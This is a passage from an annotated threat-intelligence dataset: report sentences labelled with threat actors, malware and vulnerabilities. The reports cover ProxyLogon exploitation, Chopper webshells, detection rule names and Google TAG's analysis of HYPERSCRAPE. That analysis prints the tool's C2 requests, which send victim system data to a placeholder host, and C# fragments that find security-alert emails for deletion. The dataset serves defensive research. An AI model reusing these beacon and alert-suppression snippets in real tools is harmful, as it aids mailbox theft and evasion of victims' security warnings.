journalists.","entities":[{"id":50416,"label":"threat-actor","start_offset":65,"end_offset":73},{"id":50415,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":50417,"label":"attack-pattern","start_offset":88,"end_offset":119}],"relations":[{"id":967,"from_id":50416,"to_id":50415,"type":"duplicate-of"},{"id":968,"from_id":50415,"to_id":50417,"type":"uses"}],"Comments":[]} -{"id":4574,"text":"In addition to including phishing links directly in the email, the attackers also link to PDFs and\/or DOCs, hosted on Google Drive and Microsoft One Drive, that contain a link to an attacker-controlled phishing domain.","entities":[{"id":50420,"label":"SOFTWARE","start_offset":118,"end_offset":130},{"id":50419,"label":"attack-pattern","start_offset":25,"end_offset":39},{"id":50421,"label":"SOFTWARE","start_offset":135,"end_offset":154}],"relations":[],"Comments":[]} -{"id":4576,"text":"These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[],"relations":[],"Comments":[]} -{"id":4577,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor’s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.","entities":[{"id":50428,"label":"tools","start_offset":257,"end_offset":270},{"id":50424,"label":"identity","start_offset":71,"end_offset":78},{"id":50425,"label":"threat-actor","start_offset":82,"end_offset":90},{"id":50427,"label":"SOFTWARE","start_offset":204,"end_offset":219},{"id":50423,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":50426,"label":"identity","start_offset":136,"end_offset":175}],"relations":[{"id":969,"from_id":50423,"to_id":50425,"type":"duplicate-of"},{"id":970,"from_id":50423,"to_id":50426,"type":"impersonates"}],"Comments":[]} -{"id":4578,"text":"In just two days, the volume observed and categorized as spam by Gmail exceeded 4,500 emails.","entities":[{"id":50429,"label":"SOFTWARE","start_offset":65,"end_offset":70}],"relations":[],"Comments":[]} -{"id":4580,"text":"Last March it seemed the world came to a stand-still as the COVID-19 pandemic begin to rapidly spread.","entities":[{"id":50431,"label":"TIME","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} -{"id":4581,"text":"While businesses, sporting events, and schools started shutting down, cybercriminals remained active as ever.","entities":[],"relations":[],"Comments":[]} -{"id":4582,"text":"In 2020, the Trend Micro Zero Day Initiative™ (ZDI) published 1,453 advisories, the most ever in the history of the program.","entities":[{"id":50433,"label":"identity","start_offset":13,"end_offset":51},{"id":50432,"label":"TIME","start_offset":3,"end_offset":7}],"relations":[],"Comments":[]} -{"id":4583,"text":"More startling is the fact that 18.6% of all disclosures were published without a fix from the vendor—another record-breaking stat.","entities":[],"relations":[],"Comments":[]} -{"id":4584,"text":" As ZDI predicted, 2021 continued to be a busy year.","entities":[{"id":50434,"label":"identity","start_offset":4,"end_offset":7},{"id":50435,"label":"TIME","start_offset":19,"end_offset":23}],"relations":[],"Comments":[]} -{"id":4585,"text":"In March 2021, Microsoft kicked off the patch cycle early after releasing an advisory regarding the mass exploitation of four zero-days vulnerabilities by a Chinese Hacking group, HAFNIUM, on the on-premises versions of the Microsoft Exchange Server.","entities":[{"id":50436,"label":"TIME","start_offset":3,"end_offset":13},{"id":50437,"label":"identity","start_offset":15,"end_offset":24},{"id":50438,"label":"vulnerability","start_offset":126,"end_offset":151},{"id":50439,"label":"threat-actor","start_offset":180,"end_offset":187},{"id":50440,"label":"location","start_offset":157,"end_offset":164},{"id":50441,"label":"SOFTWARE","start_offset":196,"end_offset":249}],"relations":[{"id":971,"from_id":50439,"to_id":50440,"type":"located-at"},{"id":972,"from_id":50439,"to_id":50438,"type":"exploits"},{"id":973,"from_id":50441,"to_id":50438,"type":"has"}],"Comments":[]} -{"id":4586,"text":"In the following days of the attack, Trend Micro reported that at least 30,000 organizations were thought to have been attacked in the US, and 63,000 servers remained exposed to these exploits.","entities":[{"id":50443,"label":"location","start_offset":135,"end_offset":137},{"id":50442,"label":"identity","start_offset":37,"end_offset":48}],"relations":[],"Comments":[]} -{"id":4587,"text":" The vulnerability has been dubbed as ProxyLogon by the researchers at DEVCORE, who are credited with finding the bugs in the proxy architecture and the logon mechanism of Exchange.","entities":[{"id":50446,"label":"SOFTWARE","start_offset":172,"end_offset":180},{"id":50444,"label":"vulnerability","start_offset":38,"end_offset":48},{"id":50445,"label":"identity","start_offset":71,"end_offset":78}],"relations":[{"id":974,"from_id":50446,"to_id":50444,"type":"has"}],"Comments":[]} -{"id":4588,"text":"DEVCORE reported two of the four zero-days (CVE-2021-26855 and CVE-2021-27065) to Microsoft Security Response Center (MSRC).","entities":[{"id":50447,"label":"identity","start_offset":0,"end_offset":7},{"id":50448,"label":"vulnerability","start_offset":44,"end_offset":58},{"id":50449,"label":"vulnerability","start_offset":63,"end_offset":77},{"id":50450,"label":"identity","start_offset":82,"end_offset":123}],"relations":[],"Comments":[]} -{"id":4589,"text":"On March 2, Volexity reported in-the-wild exploitation of the vulnerabilities, to which DEVCORE confirmed that the exploit observed by Volexity was the one submitted to MSRC.","entities":[{"id":50451,"label":"TIME","start_offset":3,"end_offset":10},{"id":50452,"label":"identity","start_offset":12,"end_offset":20},{"id":50453,"label":"identity","start_offset":88,"end_offset":95},{"id":50454,"label":"identity","start_offset":135,"end_offset":143},{"id":50455,"label":"identity","start_offset":169,"end_offset":173}],"relations":[],"Comments":[]} -{"id":4590,"text":"Since then, there has been opportunistic exploitation by various threat actors and ransomware groups (Dearcry, BlackKingdom) since majority of Outlook Web App portals are public and indexed by search engines like Google Search, Shodan, Binaryedge, Censys, Zoomeye etc.","entities":[{"id":50458,"label":"SOFTWARE","start_offset":143,"end_offset":158},{"id":50459,"label":"SOFTWARE","start_offset":213,"end_offset":226},{"id":50461,"label":"SOFTWARE","start_offset":236,"end_offset":246},{"id":50462,"label":"SOFTWARE","start_offset":248,"end_offset":254},{"id":50456,"label":"threat-actor","start_offset":102,"end_offset":109},{"id":50457,"label":"threat-actor","start_offset":111,"end_offset":123},{"id":50463,"label":"SOFTWARE","start_offset":256,"end_offset":263},{"id":50460,"label":"SOFTWARE","start_offset":228,"end_offset":234}],"relations":[],"Comments":[]} -{"id":4591,"text":"According to Shodan, on March 4, there were more than 266,000 Exchange Servers vulnerable to the ProxyLogon vulnerability, a day after the patch was released.","entities":[{"id":50465,"label":"TIME","start_offset":24,"end_offset":31},{"id":50464,"label":"identity","start_offset":13,"end_offset":19},{"id":50466,"label":"SOFTWARE","start_offset":62,"end_offset":78},{"id":50467,"label":"vulnerability","start_offset":97,"end_offset":121}],"relations":[{"id":976,"from_id":50466,"to_id":50467,"type":"has"}],"Comments":[]} -{"id":4592,"text":" Fig - Shodan Results ","entities":[{"id":50468,"label":"SOFTWARE","start_offset":13,"end_offset":19}],"relations":[],"Comments":[]} -{"id":4593,"text":"In lieu of these exploits, let’s take a look at how Trend Micro Vision One™ and Trend Micro Cloud One™ can provide protection against two of the four zero-days, CVE-2021-26855 and CVE-2021-27065.","entities":[{"id":50469,"label":"SOFTWARE","start_offset":52,"end_offset":75},{"id":50470,"label":"SOFTWARE","start_offset":80,"end_offset":102},{"id":50471,"label":"vulnerability","start_offset":161,"end_offset":175},{"id":50472,"label":"vulnerability","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} -{"id":4594,"text":"Overview:","entities":[],"relations":[],"Comments":[]} -{"id":4595,"text":"Two bugs are chained to achieve the remote code execution and for the attack to be successful, an attacker requires access to the Outlook Web App portal of the vulnerable Exchange Server, and a valid email address","entities":[{"id":50473,"label":"SOFTWARE","start_offset":130,"end_offset":145},{"id":50474,"label":"SOFTWARE","start_offset":171,"end_offset":186}],"relations":[],"Comments":[]} -{"id":4596,"text":" CVE-2021-26855: Microsoft Exchange Server Remote Code Execution Vulnerability (pre-authenticated Server-Side Request Forgery [SSRF]) CVE-2021-27065: Microsoft Exchange Server Remote Code Execution Vulnerability (post-authenticated Arbitrary File Write) Fig - MS Exchange Client Access Protocol Architecture The Client Access services (Outlook Web App portal) proxies the incoming connections to the Backend services.","entities":[{"id":50475,"label":"vulnerability","start_offset":3,"end_offset":17},{"id":50478,"label":"vulnerability","start_offset":152,"end_offset":213},{"id":50476,"label":"vulnerability","start_offset":19,"end_offset":80},{"id":50477,"label":"vulnerability","start_offset":136,"end_offset":150}],"relations":[{"id":977,"from_id":50476,"to_id":50475,"type":"duplicate-of"},{"id":978,"from_id":50478,"to_id":50477,"type":"duplicate-of"}],"Comments":[]} -{"id":4597,"text":"As per the Exchange documentation, clients don’t directly connect to the backend services.","entities":[{"id":50479,"label":"SOFTWARE","start_offset":11,"end_offset":19}],"relations":[],"Comments":[]} -{"id":4598,"text":"But because of the SSRF vulnerability, attackers can query the internal backend services and APIs on the Exchange Server, bypassing the frontend proxy.","entities":[{"id":50481,"label":"SOFTWARE","start_offset":105,"end_offset":120},{"id":50480,"label":"vulnerability","start_offset":19,"end_offset":37}],"relations":[],"Comments":[]} -{"id":4599,"text":"By abusing the SSRF, attackers can create session IDs and access tokens for privileged accounts with the context of the Exchange Control Panel, which can be used to write files with attacker-controlled content at a location on the target server, chosen by the attacker.","entities":[{"id":50482,"label":"attack-pattern","start_offset":15,"end_offset":19},{"id":50483,"label":"SOFTWARE","start_offset":120,"end_offset":128}],"relations":[],"Comments":[]} -{"id":4600,"text":"Since Exchange depends on Internet Information Services (IIS) webserver, an attacker can write ASPX webshells and run arbitrary commands as SYSTEM on the Exchange Server. In January 2021, we came across extensive use of Chopper ASPX webshells in targeted attacks by malicious actors to establish persistence and a foothold on the public-facing Outlook Web App servers. Trend Micro Cloud One™ – Workload Security Correlation:","entities":[{"id":50484,"label":"SOFTWARE","start_offset":6,"end_offset":14},{"id":50487,"label":"malware","start_offset":95,"end_offset":109},{"id":50489,"label":"malware","start_offset":221,"end_offset":243},{"id":50490,"label":"SOFTWARE","start_offset":345,"end_offset":360},{"id":50491,"label":"SOFTWARE","start_offset":372,"end_offset":394},{"id":50485,"label":"SOFTWARE","start_offset":26,"end_offset":61},{"id":50486,"label":"SOFTWARE","start_offset":154,"end_offset":169},{"id":50488,"label":"TIME","start_offset":175,"end_offset":187}],"relations":[],"Comments":[]} -{"id":4601,"text":"Trend Micro Cloud One™ – Workload Security is a cloud-native solution that provides automated security via powerful APIs.","entities":[{"id":50492,"label":"SOFTWARE","start_offset":0,"end_offset":22}],"relations":[],"Comments":[]} -{"id":4602,"text":"Security as code allows DevOps teams to bake security into their build pipeline to release continuously and frequently, so developers like yourself, can keep working without disruption from security.","entities":[],"relations":[],"Comments":[]} -{"id":4603,"text":"Workload Security uses advanced security controls such as intrusion prevention system (IPS), deep packet inspection (DPI), and integrity monitoring to protect Exchange Servers from attackers that could exploit ProxyLogon.","entities":[{"id":50494,"label":"SOFTWARE","start_offset":159,"end_offset":175},{"id":50493,"label":"vulnerability","start_offset":210,"end_offset":220}],"relations":[{"id":979,"from_id":50494,"to_id":50493,"type":"has"}],"Comments":[]} -{"id":4604,"text":"The following detection rules safeguard a vulnerable Exchange Server from the CVEs reported: Intrusion Prevention System detections: 1010854 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855) 1010868 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) 1010870 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) – 1 1007170 - Identified Suspicious China Chopper Webshell Communication (ATT&CK T1100) 1005934 - Identified Suspicious Command Injection Attack Integrity Monitoring detections: 1010855 - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities 1010854 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855) 1007170 - Identified Suspicious China Chopper Webshell Communication (ATT&CK T1100) 1010870 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1 1005934 - Identified Suspicious Command Injection Attack ","entities":[{"id":50495,"label":"SOFTWARE","start_offset":53,"end_offset":68},{"id":50496,"label":"vulnerability","start_offset":147,"end_offset":225},{"id":50497,"label":"vulnerability","start_offset":236,"end_offset":314},{"id":50498,"label":"vulnerability","start_offset":325,"end_offset":403},{"id":50501,"label":"vulnerability","start_offset":664,"end_offset":742},{"id":50499,"label":"threat-actor","start_offset":615,"end_offset":622},{"id":50500,"label":"malware","start_offset":780,"end_offset":802},{"id":50502,"label":"vulnerability","start_offset":847,"end_offset":925}],"relations":[],"Comments":[]} -{"id":4605,"text":"IM Rules: 1010855 - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities Trend Micro Vision One™ Correlation: Fig - Microsoft Exchange Server RCE Vulnerability (CVE-2021-26855 + CVE-2021-27065) Trend Micro Vision One™ is a purpose-built, threat defense platform with extended detection and response (XDR) capabilities that work to prevent majority of attacks with automated protection.","entities":[{"id":50505,"label":"SOFTWARE","start_offset":83,"end_offset":106},{"id":50504,"label":"threat-actor","start_offset":46,"end_offset":53},{"id":50507,"label":"SOFTWARE","start_offset":213,"end_offset":236},{"id":50506,"label":"vulnerability","start_offset":131,"end_offset":208},{"id":50503,"label":"SOFTWARE","start_offset":25,"end_offset":43}],"relations":[],"Comments":[]} -{"id":4606,"text":"The solution allows you to see more and respond faster by collecting and correlating data across email, endpoints, servers, cloud workloads, and networks.","entities":[],"relations":[],"Comments":[]} -{"id":4607,"text":" Using the Trend Micro Vision One Workbench, you can easily see what threats were detected, attack techniques, and a prioritized list of risky devices and users.","entities":[{"id":50508,"label":"SOFTWARE","start_offset":11,"end_offset":43}],"relations":[],"Comments":[]} -{"id":4608,"text":"With Trend Micro Vision One, we ran a public proof of concept (PoC) available online exploiting the ProxyLogon vulnerability.","entities":[{"id":50509,"label":"SOFTWARE","start_offset":5,"end_offset":27},{"id":50510,"label":"vulnerability","start_offset":100,"end_offset":124}],"relations":[],"Comments":[]} -{"id":4609,"text":"The above image shows the vulnerability detected and all the assets related to the alert for further investigation.","entities":[],"relations":[],"Comments":[]} -{"id":4610,"text":"Let’s take a deeper look:","entities":[],"relations":[],"Comments":[]} -{"id":4611,"text":" Fig - Potential Chopper Webshell Detection","entities":[{"id":50511,"label":"malware","start_offset":21,"end_offset":37}],"relations":[],"Comments":[]} -{"id":4612,"text":" The Potential Chopper Webshell Execution model triggers when the web shell is already present on the machine and is being used as a backdoor to run commands as SYSTEM on the Exchange Server using China Chopper. The metrics provided by this model should be investigated carefully, since the ProxyLogon zero-day vulnerability was exploited in-the-wild, before Microsoft addressed the issue publicly.","entities":[{"id":50512,"label":"malware","start_offset":18,"end_offset":34},{"id":50514,"label":"malware","start_offset":200,"end_offset":213},{"id":50515,"label":"vulnerability","start_offset":295,"end_offset":328},{"id":50513,"label":"SOFTWARE","start_offset":178,"end_offset":193},{"id":50516,"label":"identity","start_offset":363,"end_offset":372}],"relations":[],"Comments":[]} -{"id":4613,"text":"Microsoft has since taken things a step further by creating patches for out-of-support versions of Exchange.","entities":[{"id":50517,"label":"identity","start_offset":0,"end_offset":9},{"id":50518,"label":"SOFTWARE","start_offset":99,"end_offset":107}],"relations":[],"Comments":[]} -{"id":4614,"text":"Overall, Microsoft released patches for 89 unique CVEs in March—14 of which were listed as Critical and 75 listed as Important in severity.","entities":[{"id":50519,"label":"identity","start_offset":9,"end_offset":18},{"id":50520,"label":"vulnerability","start_offset":40,"end_offset":54},{"id":50521,"label":"TIME","start_offset":58,"end_offset":66}],"relations":[],"Comments":[]} -{"id":4615,"text":" Fig - Microsoft Exchange Server Possible ASPX Web Shell The above model triggers when a new web shell is created.","entities":[{"id":50522,"label":"vulnerability","start_offset":11,"end_offset":60}],"relations":[],"Comments":[]} -{"id":4616,"text":"You can see the path and name of the web shell.","entities":[{"id":50523,"label":"attack-pattern","start_offset":37,"end_offset":46}],"relations":[],"Comments":[]} -{"id":4617,"text":"Fig - Potential Chopper Webshell Execution Fig - Identified Suspicious China Chopper Webshell Communication Fig - Possible Credential Dumping via Command Line ","entities":[{"id":50524,"label":"malware","start_offset":16,"end_offset":32},{"id":50525,"label":"malware","start_offset":76,"end_offset":98},{"id":50526,"label":"attack-pattern","start_offset":133,"end_offset":151}],"relations":[],"Comments":[]} -{"id":4618,"text":"This model is triggered when an attacker fetches the credentials using a command-line from within the memory using Mimikatz.","entities":[{"id":50527,"label":"tools","start_offset":115,"end_offset":123}],"relations":[],"Comments":[]} -{"id":4619,"text":"Since the web shell runs as the SYSTEM user, an attacker can fetch the NT LAN Manager (NTLM) hashes of the logged-in users, create or delete accounts, and perform extensive post-exploitation activities on the Exchange Server. Figure - Executing Mimikatz as SYSTEM using CC Fig - System Owner User Discovery The above event was triggered when we ran whoami from within the Chopper web shell.","entities":[{"id":50529,"label":"SOFTWARE","start_offset":209,"end_offset":224},{"id":50530,"label":"malware","start_offset":386,"end_offset":403},{"id":50531,"label":"tools","start_offset":250,"end_offset":258},{"id":50528,"label":"attack-pattern","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} -{"id":4620,"text":"Since requests to the ASPX web shell are handled by the privileged w3wp.exe, an IIS Worker Process in the configured IIS application pool (Microsoft Exchange App pool) runs the commands in the context of NT Authority\\SYSTEM user.","entities":[{"id":50532,"label":"attack-pattern","start_offset":22,"end_offset":36},{"id":50533,"label":"FILEPATH","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} -{"id":4621,"text":"RCA Diagrams: Fig. Executing commands using Chopper CnC Conclusion","entities":[],"relations":[],"Comments":[]} -{"id":4622,"text":"There is no silver bullet when it comes to cybersecurity but using solutions that bake into your development pipeline to provide security as early as possible is better than scrambling for patches after deployment.","entities":[],"relations":[],"Comments":[]} -{"id":4623,"text":"Quick and easy to deploy solutions like Trend Micro Cloud One and Trend Micro Vision One can provide you with SecOps-approved security from build-time to runtime without slowing you down.","entities":[{"id":50534,"label":"SOFTWARE","start_offset":40,"end_offset":61},{"id":50535,"label":"SOFTWARE","start_offset":66,"end_offset":88}],"relations":[],"Comments":[]} -{"id":4624,"text":"Imagine that!","entities":[],"relations":[],"Comments":[]} -{"id":4625,"text":" Tags Cloud | APT & Targeted Attacks | Expert Perspective | Exploits & Vulnerabilities | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} -{"id":4626,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users.","entities":[{"id":50537,"label":"identity","start_offset":55,"end_offset":61},{"id":50538,"label":"threat-actor","start_offset":132,"end_offset":137},{"id":50539,"label":"threat-actor","start_offset":142,"end_offset":157},{"id":50540,"label":"location","start_offset":162,"end_offset":169},{"id":50536,"label":"identity","start_offset":11,"end_offset":14}],"relations":[{"id":980,"from_id":50538,"to_id":50540,"type":"located-at"},{"id":981,"from_id":50539,"to_id":50540,"type":"located-at"}],"Comments":[]} -{"id":4627,"text":"For years, we have been countering this group’s efforts to hijack accounts, deploy malware, and their use of novel techniques to conduct espionage aligned with the interests of the Iranian government.","entities":[{"id":50541,"label":"identity","start_offset":181,"end_offset":199}],"relations":[],"Comments":[]} -{"id":4628,"text":"Now, we’re shining light on a new tool of theirs.","entities":[],"relations":[],"Comments":[]} -{"id":4629,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":50543,"label":"identity","start_offset":18,"end_offset":21},{"id":50544,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":50545,"label":"malware","start_offset":69,"end_offset":80},{"id":50546,"label":"SOFTWARE","start_offset":111,"end_offset":116},{"id":50542,"label":"TIME","start_offset":3,"end_offset":16},{"id":50547,"label":"SOFTWARE","start_offset":118,"end_offset":124},{"id":50548,"label":"SOFTWARE","start_offset":130,"end_offset":147}],"relations":[{"id":982,"from_id":50545,"to_id":50544,"type":"authored-by"}],"Comments":[]} -{"id":4630,"text":"The attacker runs HYPERSCRAPE on their own machine to download victims’ inboxes using previously acquired credentials.","entities":[{"id":50549,"label":"malware","start_offset":18,"end_offset":29}],"relations":[],"Comments":[]} -{"id":4632,"text":"The oldest known sample is from 2020, and the tool is still under active development.","entities":[{"id":50551,"label":"TIME","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} -{"id":4633,"text":"We have taken actions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.","entities":[],"relations":[],"Comments":[]} -{"id":4634,"text":"This post will provide technical details about HYPERSCRAPE, similar to PWC’s recently published analysis on a Telegram grabber tool.","entities":[{"id":50552,"label":"malware","start_offset":47,"end_offset":58},{"id":50554,"label":"SOFTWARE","start_offset":110,"end_offset":118},{"id":50553,"label":"identity","start_offset":71,"end_offset":74}],"relations":[],"Comments":[]} -{"id":4635,"text":"HYPERSCRAPE demonstrates Charming Kitten’s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":50555,"label":"malware","start_offset":0,"end_offset":11},{"id":14080,"label":"threat-actor","start_offset":25,"end_offset":40}],"relations":[],"Comments":[]} -{"id":4636,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives.","entities":[{"id":50556,"label":"malware","start_offset":28,"end_offset":39},{"id":14084,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[],"Comments":[]} -{"id":4637,"text":" HYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired.","entities":[{"id":50557,"label":"malware","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} -{"id":4638,"text":"It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail.","entities":[{"id":50558,"label":"SOFTWARE","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} -{"id":4639,"text":"Once logged in, the tool changes the account’s language settings to English and iterates through the contents of the mailbox, individually downloading messages as .eml files and marking them unread.","entities":[],"relations":[],"Comments":[]} -{"id":4640,"text":"After the program has finished downloading the inbox, it reverts the language back to its original settings and deletes any security emails from Google.","entities":[{"id":50559,"label":"identity","start_offset":145,"end_offset":151}],"relations":[],"Comments":[]} -{"id":4641,"text":"Earlier versions contained the option to request data from Google Takeout, a feature which allows users to export their data to a downloadable archive file.","entities":[{"id":50560,"label":"SOFTWARE","start_offset":59,"end_offset":73}],"relations":[],"Comments":[]} -{"id":4642,"text":"The tool is written in .NET for Windows PCs and is designed to run on the attacker's machine.","entities":[{"id":50561,"label":"SOFTWARE","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} -{"id":4643,"text":"We tested HYPERSCRAPE in a controlled environment with a test Gmail Account, although functionality may differ for Yahoo! and Microsoft accounts.","entities":[{"id":50562,"label":"malware","start_offset":10,"end_offset":21},{"id":50563,"label":"SOFTWARE","start_offset":62,"end_offset":67},{"id":50564,"label":"identity","start_offset":115,"end_offset":121},{"id":50565,"label":"identity","start_offset":126,"end_offset":135}],"relations":[],"Comments":[]} -{"id":4644,"text":"HYPERSCRAPE won't run unless in a directory with other file dependencies.","entities":[{"id":50566,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":4645,"text":"When launched, the tool makes an HTTP GET request to a C2 to check for a response body of \"OK'' and will terminate if it's not found.","entities":[],"relations":[],"Comments":[]} -{"id":4646,"text":"In the version tested, the C2 was unobfuscated and stored as a hardcoded string.","entities":[],"relations":[],"Comments":[]} -{"id":4647,"text":"In later versions it was obfuscated with Base64.","entities":[],"relations":[],"Comments":[]} -{"id":4648,"text":"GET http:\/\/{C2}\/Index.php?Ck=OK HTTP\/1.1","entities":[{"id":50567,"label":"URL","start_offset":4,"end_offset":31}],"relations":[],"Comments":[]} -{"id":4649,"text":"Host: {C2}","entities":[],"relations":[],"Comments":[]} -{"id":4650,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} -{"id":4651,"text":"The tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string to a valid cookie file.","entities":[],"relations":[],"Comments":[]} -{"id":4652,"text":"A new form is displayed if the information is not provided via command prompt.","entities":[],"relations":[],"Comments":[]} -{"id":4653,"text":"Once provided, the data in the \"Identity\" field is sent to a C2 for confirmation.","entities":[],"relations":[],"Comments":[]} -{"id":4654,"text":"Again, the response is expected to be \"OK\".","entities":[],"relations":[],"Comments":[]} -{"id":4655,"text":"GET http:\/\/{C2}\/Index.php?vubc={identity} HTTP\/1.1","entities":[{"id":14119,"label":"URL","start_offset":4,"end_offset":40}],"relations":[],"Comments":[]} -{"id":4656,"text":"Host: {C2} Accept-Encoding: gzip","entities":[],"relations":[],"Comments":[]} -{"id":4657,"text":"If the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and drop.","entities":[],"relations":[],"Comments":[]} -{"id":4658,"text":"After parsing, the cookies are inserted into a local cache used by the embedded web browser.","entities":[],"relations":[],"Comments":[]} -{"id":4659,"text":"A new folder named \"Download\" is created adjacent to the main binary.","entities":[],"relations":[],"Comments":[]} -{"id":4660,"text":"The browser then navigates to Gmail to begin the data collection.","entities":[{"id":50568,"label":"SOFTWARE","start_offset":30,"end_offset":35}],"relations":[],"Comments":[]} -{"id":4661,"text":"The user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the attacker to enable the basic HTML view in Gmail.","entities":[{"id":50569,"label":"SOFTWARE","start_offset":157,"end_offset":162}],"relations":[],"Comments":[]} -{"id":4662,"text":"If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.","entities":[],"relations":[],"Comments":[]} -{"id":4663,"text":"Once the attacker has logged in to the victim’s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not.","entities":[{"id":50570,"label":"malware","start_offset":57,"end_offset":68}],"relations":[],"Comments":[]} -{"id":4664,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} -{"id":4665,"text":"HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download.","entities":[{"id":50571,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":4666,"text":"It does the following for each email found: The emails are saved with \".eml\" extensions under the Downloads directory with the filename corresponding to the subject.","entities":[],"relations":[],"Comments":[]} -{"id":4667,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} -{"id":4668,"text":"When finished, a HTTP POST request is made to the C2 to relay the status and system information.","entities":[],"relations":[],"Comments":[]} -{"id":4669,"text":"The downloaded emails are not sent to the C2.","entities":[],"relations":[],"Comments":[]} -{"id":4670,"text":"POST http:\/\/{C2}\/?Key={GUID}&Crc={Identifier} { \"appName\": \"Gmail Downloader\", \"targetname\": \"{Email}\", \"HostName\": \"REDACTED\", \"srcUserIP\": \"REDACTED\", \"actionType\": \"First\", \"timeOccurrence\": \"05\/01\/2022 05:50:31 PM\", \"OS\": \"REDACTED\", \"OSVersion\": \"REDACTED\", \"SystemModel\": \"REDACTED\", \"SystemType\": \"REDACTED\", \"srcName\": \"REDACTED\", \"srcOrgName\": \"REDACTED\" }","entities":[{"id":50573,"label":"TIME","start_offset":195,"end_offset":217},{"id":14144,"label":"URL","start_offset":5,"end_offset":44}],"relations":[],"Comments":[]} -{"id":4671,"text":"The program will delete any security emails from Google generated by the attacker’s activity.","entities":[{"id":50574,"label":"identity","start_offset":49,"end_offset":55}],"relations":[],"Comments":[]} -{"id":4672,"text":"private bool IsThereAnyEMail() { List < GeckoHtmlElement > list = (from x in this.geckoWebBrowser.Document.GetElementsByTagName(\"span\") where x.TextContent.StartsWith (\"Security alert\") || x.TextContent.StartsWith(\"Archive of Google data requested\") || x.TextContent.StartsWith(\"Your Google data archive is ready\") || x.TextContent.StartsWith(\"Your Google data is ready\") || x.TextContent.StartsWith(\"Critical security alert\") ||","entities":[],"relations":[],"Comments":[]} -{"id":4673,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") ||","entities":[],"relations":[],"Comments":[]} -{"id":4674,"text":"x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.","entities":[],"relations":[],"Comments":[]} -{"id":4675,"text":"StartsWith(\"Help us protect you: Security advice from Google\")","entities":[],"relations":[],"Comments":[]} -{"id":4676,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} -{"id":4677,"text":"GeckoHtmlElement > (","entities":[],"relations":[],"Comments":[]} -{"id":4678,"text":"; bool flag = list.Count == 0; return !flag; }","entities":[],"relations":[],"Comments":[]} -{"id":4679,"text":"Data from Google Takeout is also available upon request, but the option was only found in early builds.","entities":[{"id":50575,"label":"SOFTWARE","start_offset":10,"end_offset":24}],"relations":[],"Comments":[]} -{"id":4680,"text":"The functionality was not automated and it's unclear why it was removed in later versions.","entities":[],"relations":[],"Comments":[]} -{"id":4681,"text":"When conducting a Takeout, the program will spawn a new copy of itself and initialize a pipe communication channel to relay the cookies and account name, both of which are required to accomplish the Takeout.","entities":[],"relations":[],"Comments":[]} -{"id":4682,"text":"When they are received, the browser navigates to the official Takeout link to request and eventually download the exported data.","entities":[],"relations":[],"Comments":[]} -{"id":4683,"text":"public void ManageTakeOut() { string text = \"PipeName\";","entities":[],"relations":[],"Comments":[]} -{"id":4684,"text":"Process process = new Process(); process.StartInfo.Arguments = string.Format(\"PIPE Google \\\"{0}\\\"\", text); process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName; process.Start();","entities":[],"relations":[],"Comments":[]} -{"id":4685,"text":"PipeCommunication pipeCommunication = new PipeCommunication(true, text); bool flag = false; while (!flag)","entities":[],"relations":[],"Comments":[]} -{"id":4686,"text":"{ try { JsonInfo jsonInfo = pipeCommunication.Read(); switch (jsonInfo.Type) { case JsonType.GetCookies: jsonInfo.Data = this.CookieText; pipeCommunication.Write(jsonInfo); break; case JsonType.TakeOutFile: flag = true; break; case JsonType.GetUsername: while (this.OperationObject.GetUsername() 